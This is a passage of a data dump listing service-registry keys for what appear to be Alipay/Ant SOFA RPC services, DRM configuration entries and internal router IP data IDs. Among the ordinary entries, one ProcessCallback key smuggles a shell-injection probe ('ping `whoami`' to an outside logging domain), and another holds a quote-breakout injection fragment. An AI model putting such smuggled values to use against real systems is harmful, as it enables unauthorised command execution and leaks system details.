","com.alipay.cardbin.common.service.facade.CardBinClientFacade:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.serverlessplan.HuanyuServerlessPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gotone.common.service.api.SubscribeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInUserIdLocateValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.163.223#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ugstrategycenter.common.service.facade.groupgrowth.GeneratedExchangeStrategyOperateFacade:1.0:gpExchangeStrategyOperateFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:reading@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixContains,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.core.orderexec.fundapply.config.impl.FundApplyExecConfigDRMResource.whiteListUserId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.baitiaodecision.common.service.facade.api.BaitiaoUserControlCacheFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP-S-AFTS_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finscprod.facade.eventhubs.StockQuotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.bizrecon.QueryCheckResultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:SERVICEREQUEST@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.mpcard.McardExpireFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:TENANTEXP@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileha.core.service.antha.AnthaQuestionRecordDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.88#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:iotcms@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudprovision:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaLogParamSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinwormhole.common.service.facade.api.RealTimeIncrementDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.govdataprod.mychain.gov.facade.api.CommercialService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.appointment.ProductSpecAppointmentQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.common.service.facade.FundEventService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.246.245#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.instsign.common.service.facade.priceinfo.PriceInfoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custinsight.common.service.facade.alipaymember.AlipayMemberRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.service.facade.OpenRouteConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:mobilesecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassistantcore.common.service.facade.aoliao.api.RecMngManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.security.sandbox.runtime.facade.service.SecuritySandboxExperimentDataFacade:1.0:unique-6274@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.waitersupport.facade.WeatherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acdoccore.common.service.facade.category.DocDownloadManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelink.cache.CompensateCache:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.facade.FinfoServiceSignatureService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.yqapi.facade.yqapi.SlsContentHandlerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.riskmng:name=com.alipay.riskmng.core.service.drm.impl.SocialUniformEventSwitchImpl.extendComplainTaskEndEvent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditamount.prod.facade.AmountTransferXtsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:insscenebff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgopen.common.sdk.infra.cache.CacheService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.wall.common.service.InsRenewalOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.42.41#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:ebppprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscsalipay.common.service.facade.risk.RiskBusinessConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.FeatureCalcService:1.0:publicDomain_malgo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.lendpofprod.lendpofprod_ds.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.findecision.common.service.facade.decision.DecisionDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.cityTrfcMapStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insrenewprod.common.service.facade.api.common.InsRenewprodOpsFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:kbitemprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custcenter.service.facade.InvolvedPartyRoleViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.158.95#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.RCacheServerTBaseCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pointmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.ctokenCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.1.57#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.riskservice.spi.OpsChngAsyncRiskService:1.0:bkPromoGuardOpsChngAsyncRisk@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.common.service.facade.confcenter.manager.RuleManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.authcenter.service.facade.MyPassLoginFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accenter.service.query.api.AccenterInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.sceneinvest.starwish.api.StarWishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:iprodmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:zhubalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:nfccdbsync@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.160.159.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.55.74.180#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.contentlib.common.service.api.content.qa.CounterQueryApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.ProcessActionFacade:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.alipaypcard.api.AlipayPCardtransTransVoucherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.238.166#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.transferprod.common.service.facade.api.AgreementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniselfop.facade.api.selfopact.SelfOpActDeliveryMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_dacuprod_scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.insttrade:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.imkteye.common.service.facade.api.daengine.MetaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileweb.common.client.service.ShareCodeConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intimateprod.common.service.facade.spi.IntimateBenefitCallbackService:1.0:mwealthprod_lifeapp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.vega-integration-kepler:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:chair-tr-test-app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.68.68#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sportsprod.common.service.facade.SportsStepsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanmarket.common.service.facade.campaign.CampaignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:ordermng@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.252.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dataqualitytestsvr.facade.dq.DqAlarmMngServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.isv.BenchBizTypeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.180.137#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.fcbuservice.common.service.facade.ProdActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:aldingprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.drm.PasswordRevokeSwitch.simplePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mdeviceprod.common.service.facade.netflow.UserDeviceNetflowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clive.biz.cscc.websocket.WebSocketNotification:1.0:nativeWebSocketNotification@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.ap.acquirefront.service.facade.api.standard.AcquireStandardRefundService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.finpwm.FinpwmCfgDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0.0:finworks-auditTaskcenterCallbackManager@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:acmantzhixin@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.0.4#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.core.drm.SlaveQueryDrm.starWishAuthExe,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insinformcore.common.service.facade.std.api.StdInformContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.20.190.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fintradeguard.core.service.repository.ZdalSequenceRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.globalsite.facade.api.mlm.PmsRelationCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trsbrain.common.service.facade.service.BuInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.resourceput.ResourcePutFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dss.endpoint.plugin.openapi.CommonOpenApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.drmdemos:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acccenter.common.service.facade.integration.system.yunyou.YunyouFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\";ping `whoami`86842598-80102053-uniqueId-104003035.rce.noble.log.lynnshare.cc;\"@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.UserDisputeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.58.197#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.publiccore.common.service.facade.punish.SecurityPunishFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.development.common.facade.api.LocalDebugApi:1.0:dpstreaming@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasset.common.service.facade.stuff.bff.StuffProduceOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insapportion.biz.shared.gray.CommonGrayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\"'>@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbadvert.biz.delivery.rpc.AdvDiscountQueryRpcService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.1.209#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditauthprod.service.facade.zmgo.quit.QuitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:finbankbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openpunish.facade.callback.PunishmentActionCallback:1.0:openhome.punishmentActionCallback@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.236.156#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zcbsalescenter.common.service.integration.fintradecenter.FintradeInstSignContractQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.quality.ArgoQualityIntelligenceTestSpi:1.0:etetestprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.alsc.api.StoreWritebackKoubeiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:afsc_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baitiaoprod.biz.agreement.service.SellerService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreCzoneTairCache_dest.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.chaos.dig.facade.AttackRecordFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.itemcore.common.service.facade.v2.ItemSearchElasticFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0.0:exrate-updateOriginRate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.chargefront:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rccenter.common.service.facade.RcHgCommonMessagePushFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.ShopOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaprod.common.service.tuition.tr.TuitionAccountApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:miniselfop@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.FeedbackOpinionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.common.datacollector.rule.internal.DataModelRuleCoordinator.dataModelWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zqueue.client.qaZQueue11#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:myFlowProcessCallBack01@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opssla.common.service.facade.MetaQueryFacade:1.0:loanopssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:finlinkdata@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mmtcaftscmdproc.common.service.facade.DeviceRcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.chargefront:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.asyncGetVipDomainsIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-rubikstwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:finquotationcenter_GRZONE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsecu.common.service.facade.api.capitalflow.CapitalFlowManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.serverRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.baoxiancore.common.service.InsEndorsementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.xviewconf:name=com.alipay.xview.conf.drm.XViewConfClientDrm.metadataClienRefreshCommand,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchprod.common.service.facade.datafactory.DataFactoryTaskTrFacade:1.0:shopAddressTrimHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:finfoprodCompanyContentProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rinsight.common.base.spi.RinsightCommonRpcSpi:1.0:merchantNameQueryService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.sync.ProductDataCalcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.rec.RecConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:appfuse@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rule.common.base.service.RuleAnalyzeRouteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.core.service.graylog.LogParseService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:apshopcentermng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.cif.drm.PasswordRevokeSwitch.serverRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ugstrategycenter.common.service.facade.generated.groupgrowth.GeneratedExchangeStrategyQueryFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfarm.common.service.facade.AntfarmTaskFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=midas.client.MidasClientStabilityDRMControl.blockSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mydds:name=com.alipay.mymdp.model.bypass.drm.DrmSwitchProxyResource.bypassModels,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.promohelix.common.service.facade.DtQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.124.173.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:trafficcardsp@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.ipay.itransferprod.service.facade.api.TransferQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.73.146.63#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_RISKMERCHANT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.api.antcloud.spring.AntCloudApiExplorer:1.0:antcloud.sas@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_M_DEVICE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_M_EXCASHIER_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.custinsight.common.service.facade.visitor.ProfitListQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.product.common.service.api.PdConfigOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","lifemock@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fintradecenter.common.service.facade.impawn.test.ImpawnAutomatedTestFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bizprod.common.service.facade.api.merchant.MerchantMetadataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.102.208.129#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mars.kepler.service.SimpleTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antemc.service.facade.EmcEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cif.facade.MobileAckCodeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vouchercore.facade.api.voucher.VoucherRefundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hainaprod.common.service.facade.api.mini.dev.MiniAnalyseOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:acctransquery@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbfeaturecenter.common.service.facade.FeatureConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloaninsight.common.service.facade.service.FluctuationInsightFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.biz.manager.calendar.CalendarManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocommopt:name=com.alipay.promocommopt.common.drm.HeatDrmResource.openHotHbaseCacheQuery,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dt.auth.client.service.AuthOpsService:1.0:dpsecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.common.service.integration.drm.loadtest.LoadTestConfigDrm.fundQueryOrderByOutNoConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ropgn.common.service.facade.GCAcceptTaskManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.common.service.fileresource.FileResourceServiceLocator:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanlend.common.service.facade.api.apply.InverseFlowQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:zbdm@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.112.58#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfocore.common.service.facade.cds.mng.PositionContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.shareprofit.ShareProfitBillQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airprod.common.service.facade.freezeunfreeze.AirQueryTradeRefundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.geoip.GeoIpService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxTaskDataWriter:1.0:echoagent@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_PRICE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.slaConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.quickrun.common.service.api.DataRunFacade:1.0:girisk@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffintrade.common.service.facade.api.FundDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlaw.common.service.facade.api.ContractTemplateFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfarm.common.service.facade.AntfarmFarmQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.service.facade.document.ResourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.api.ChatGrayConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOF